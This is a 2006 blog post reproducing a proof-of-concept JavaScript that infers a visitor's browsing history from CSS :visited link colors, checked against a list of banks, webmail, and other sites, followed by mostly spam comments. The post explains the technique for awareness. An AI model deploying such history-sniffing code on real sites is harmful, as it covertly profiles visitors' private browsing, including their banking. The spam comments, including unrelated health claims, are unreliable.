Stealing History

Thursday, August 24, 2006

Update: Cody Swan has a version that works in IE and supports AJAX to log the urls somewhere. Info here.

Jeremiah Grossman has demonstrated an interesting way to sniff out browser history via CSS hacks. IE7 RC1 is smart enough to block the site, but FireFox lists my history without any complaints. Spooky. The script it embedded on the page, and it appears that basic technique involves setting the visited link color via CSS on a group of links to common sites, and then getting the computed values of the links and seeing which ones have the visited color. Very clever way to hijack someone's history:

<script>
var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);

// popular websites. Lookup if user has visited any.
var websites = [
	"http://login.yahoo.com/",
	"http://www.jailbabes.com",
	"http://ha.ckers.org",
	"http://seoblackhat.com",
	"http://www.cgisecurity.com",
	"http://www.spidynamics.com",
	"http://www.cenzic.com",
	"http://www.watchfire.com",
	"http://www.ntobjectives.com",
	"http://www.webappsec.org",
	"http://www.whitehatsec.com",
	"http://english.aljazeera.net/HomePage",
	"http://mail.google.com/",
	"http://mail.yahoo.com/",
	"http://my.yahoo.com/",
	"http://slashdot.org/",
	"http://www.myspace.com/",
	"http://www.amazon.com/",
	"http://www.aol.com/",
	"http://www.bankofamerica.com/",
	"http://www.bankone.com/",
	"http://www.blackhat.com/",
	"http://www.blogger.com/",
	"http://www.bofa.com/",
	"http://www.capitalone.com/",
	"http://www.chase.com/",
	"http://www.citibank.com/",
	"http://www.cnn.com/",
	"http://www.comerica.com/",
	"http://www.e-gold.com/",
	"http://www.ebay.com/",
	"http://www.etrade.com/",
	"http://www.google.com/",
	"http://www.hsbc.com/",
	"http://www.icq.com/",
	"http://www.microsoft.com/",
	"http://www.msn.com/",
	"http://www.myspace.com/",
	"http://www.passport.net/",
	"http://www.paypal.com/",
	"http://www.sourceforge.net/",
	"http://www.statefarm.com/",
	"http://www.usbank.com/",
	"http://www.wachovia.com/",
	"http://www.wamu.com/",
	"http://www.wellsfargo.com/",
	"http://www.xanga.com/",
	"http://www.yahoo.com/",
	"https://commerce.blackhat.com/",
	"https:/banking.wellsfargo.com/",
];

/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {
	
	var d = document.createElement('div');
	d.id = 'xss_flag';
	document.body.appendChild(d);

	var d = document.createElement('table');
	d.border = 0;
	d.cellpadding = 5;
	d.cellspacing = 10;
	d.width = '90%';
	d.align = 'center';
	d.id = 'data';
	document.body.appendChild(d);
	
	document.write('<style>');
	for (var i = 0; i < websites.length; i++) {
		document.write('#id' + i + ":visited {color: #0000FF;}");
	}
	document.write('</style>');

	/* launch steal history */

if (is_mozilla) {
stealHistory();	
}
	
}


/*--- [method: stealHistory] -------------------------------------------#
# Description: Send a browsers history to an off-domain URL.			#
-----------------------------------------------------------------------*/
function stealHistory() {
	
	// loop through websites and check which ones have been visited
	for (var i = 0; i < websites.length; i++) {
	
		var link = document.createElement("a");
		link.id = "id" + i;
		link.href = websites[i];
		link.innerHTML = websites[i];
		
		document.body.appendChild(link);
		var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
		document.body.removeChild(link);

		// check for visited
		if (color == "rgb(0, 0, 255)") {
			document.write('<li><a href="' + websites[i] + '">' + websites[i] + '</a></li>');
		} // end visited check
		
	} // end visited website loop
	
} // end stealHistory method

</script>

[1] http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html

39 Comments

Cool, but totally useless no?
Unless you want to check if a certain person visited your website or not...

WebMaster ToolBox - Wednesday, October 4, 2006 12:22:10 AM

Not really, Its good for Blackhat SEO folks. Besides , think of what benefits Google gets out of monitoring your search preferences through their Toolbar and in gmail.
ADs pay and relevant ADs pay even more ...

i.write.code - Wednesday, May 16, 2007 8:35:38 AM

Asina - Tuesday, December 2, 2008 8:58:02 PM

Asina - Wednesday, December 3, 2008 10:03:08 AM

Semil - Saturday, December 6, 2008 4:15:57 AM

I gotta say that is a good post

Tummy Tuck - Tuesday, January 6, 2009 7:56:45 AM

What is that guy talking about?

Liposuction - Tuesday, January 6, 2009 4:02:05 PM

I'm gone to say to my little brother, that he should also pay a visit this webpage on regular basis to obtain updated from hottest gossip.

Samson - Thursday, March 21, 2013 6:41:42 PM

Your mode of telling all in this piece of writing is in fact good, all be able to effortlessly know it, Thanks a lot.

Loftus - Monday, March 25, 2013 9:33:33 PM

When I initially commented I clicked the "Notify me when new comments are added" checkbox and now each time a comment is added I get several e-mails with the same
comment. Is there any way you can remove people from that service?
Thanks!

Coates - Wednesday, March 27, 2013 2:54:33 AM

Please let me know if you're looking for a author for your blog. You have some really great articles and I believe I would be a good asset. If you ever want to take some of the load off, I'd
really like to write some articles for your blog in
exchange for a link back to mine. Please shoot me an e-mail if interested.
Regards!

Carrier - Thursday, March 28, 2013 3:25:09 AM

Hey I know this is off topic but I was wondering if
you knew of any widgets I could add to my blog that automatically
tweet my newest twitter updates. I've been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

Burleson - Thursday, March 28, 2013 8:51:52 PM

Hey! Would you mind if I share your blog with my facebook group?

There's a lot of people that I think would really enjoy your content. Please let me know. Thanks

Yarbrough - Saturday, March 30, 2013 1:36:17 AM

Very shortly this website will be famous amid all blogging people,
due to it's fastidious articles or reviews

Easter - Sunday, March 31, 2013 1:46:24 PM

This is very fascinating, You are an overly skilled blogger.
I have joined your feed and sit up for in search of extra of your magnificent post.
Also, I have shared your website in my social networks

Stricklin - Monday, April 1, 2013 1:27:02 AM

It's going to be ending of mine day, except before ending I am reading this impressive post to increase my know-how.

Mendoza - Friday, April 5, 2013 2:04:20 AM

Having read this I believed it was extremely informative.
I appreciate you finding the time and effort to put this information
together. I once again find myself personally spending way too much time both reading and leaving comments.
But so what, it was still worthwhile!

Mckinnon - Friday, April 5, 2013 5:09:48 PM

Wow that was unusual. I just wrote an really long comment but after I clicked submit my comment didn't appear. Grrrr... well I'm
not writing all that over again. Anyways, just wanted
to say great blog!

Rash - Friday, April 5, 2013 9:14:01 PM

Thankfulness to my father who shared with me on the
topic of this webpage, this web site is actually awesome.

Hayes - Friday, April 5, 2013 9:24:18 PM

I like what you guys are usually up too. Such clever work and coverage!
Keep up the wonderful works guys I've added you guys to my own blogroll.

Stark - Saturday, April 6, 2013 12:58:20 PM

Thanks , I have just been looking for info approximately this topic
for ages and yours is the best I have found out so far.
However, what concerning the conclusion? Are you certain in
regards to the supply?

North - Sunday, April 7, 2013 6:40:59 AM

This excellent website really has all of the information I wanted concerning this subject
and didn't know who to ask.

Wilkerson - Monday, April 8, 2013 12:49:54 AM

I don't drop a leave a response, but I browsed a bunch of remarks here Stealing History - Jesse Ezell Blog. I do have a few questions for you if you do not mind. Is it simply me or does it give the impression like some of these responses look as if they are coming from brain dead people? :-P And, if you are writing on additional places, I'd like to follow anything fresh you
have to post. Would you make a list of every one of your shared sites like your twitter feed, Facebook page or linkedin profile?

Stroud - Monday, April 8, 2013 2:22:09 AM

Hello, I enjoy reading through your article post. I wanted to
write a little comment to support you.

Rash - Friday, April 19, 2013 4:38:15 AM

I always used to read post in news papers but now as I am a user of web so from now I am using net for articles, thanks to web.

Crenshaw - Friday, April 19, 2013 7:58:07 AM

I've been surfing online more than 3 hours today, yet I never found any interesting article like yours. It's pretty worth enough for me.

In my opinion, if all web owners and bloggers made good content as
you did, the web will be a lot more useful than ever before.

Pfeiffer - Friday, April 19, 2013 10:34:46 AM

Hello mates, fastidious article and nice arguments commented
here, I am truly enjoying by these.

Worthington - Saturday, April 20, 2013 8:07:43 PM

If you wish for to get a great deal from this piece of writing then
you have to apply these strategies to your won website.

Catalano - Saturday, April 20, 2013 9:45:24 PM

Hi there, I read your new stuff like every week. Your humoristic style is witty, keep
it up!

Dobson - Sunday, April 21, 2013 9:06:08 AM

Do you mind if I quote a couple of your posts
as long as I provide credit and sources back to your weblog?
My website is in the exact same area of interest as yours and my visitors would certainly benefit from a lot of the information you present
here. Please let me know if this alright with you. Appreciate
it!

Hatch - Sunday, April 21, 2013 4:06:05 PM

Touche. Great arguments. Keep up the amazing effort.

Shepherd - Monday, April 22, 2013 4:52:06 AM

Wow, amazing blog layout! How long have you been blogging for?
you make blogging look easy. The overall look of your web site is
great, as well as the content!

Christianson - Monday, April 22, 2013 12:07:35 PM

Very great post. I simply stumbled upon your blog and wanted to
say that I've truly loved browsing your blog posts. After all I'll be subscribing in your feed and I'm hoping you write again very soon!

Whittaker - Monday, April 22, 2013 8:31:57 PM

Very great post. I simply stumbled upon your blog and wanted to
say that I've truly loved browsing your blog posts. After all I'll be subscribing in your feed and I'm hoping you write again very soon!

Whittaker - Monday, April 22, 2013 8:56:02 PM

Very great post. I simply stumbled upon your blog and wanted to
say that I've truly loved browsing your blog posts. After all I'll be subscribing in your feed and I'm hoping you write again very soon!

Whittaker - Tuesday, April 23, 2013 1:59:59 AM

However, this only removes the microbial acid guard from the
sebum and makes the skin more likely to get infected, causing the situation to worsen.
It contains short and medium-chain fatty acids
that support the loss of extra weight. When they are fed coconut
oil, they become very lean.

Gillum - Tuesday, April 23, 2013 1:28:02 PM

Very great post. I simply stumbled upon your blog and wanted to
say that I've truly loved browsing your blog posts. After all I'll be subscribing in your feed and I'm hoping you write again very soon!

Whittaker - Wednesday, April 24, 2013 6:16:05 AM

Very great post. I simply stumbled upon your blog and wanted to
say that I've truly loved browsing your blog posts. After all I'll be subscribing in your feed and I'm hoping you write again very soon!

Whittaker - Wednesday, April 24, 2013 11:40:01 AM

Very great post. I simply stumbled upon your blog and wanted to
say that I've truly loved browsing your blog posts. After all I'll be subscribing in your feed and I'm hoping you write again very soon!

Whittaker - Wednesday, April 24, 2013 4:56:09 PM

Comments have been disabled for this content.